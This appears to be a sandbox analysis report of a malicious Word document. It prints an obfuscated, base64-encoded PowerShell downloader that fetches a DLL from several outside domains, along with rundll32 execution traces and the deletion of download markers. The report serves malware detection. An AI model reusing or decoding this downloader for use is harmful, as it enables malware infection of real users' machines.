JwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMA
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_10004560 LoadLibraryA,GetProcAddress,AddFontResourceW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001508D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001339A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00132A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00135BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00135C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0013548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00132CFB push ecx; retn 001Eh
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00131740 push DA0FDC41h; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001908D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001739A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00172A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00175BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00175C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0017548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00172CFB push ecx; retn 001Eh
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00171740 push DA0FDC41h; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E08D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001C39A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001C2A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001C5BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001C5C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001C548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001C2CFB push ecx; retn 001Eh
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001C1740 push DA0FDC41h; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001908D0 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001739A0 push cs; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00172A01 push esi; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00175BD8 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00175C29 push ss; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0017548F push ebp; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00172CFB push ecx; retn 001Eh

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
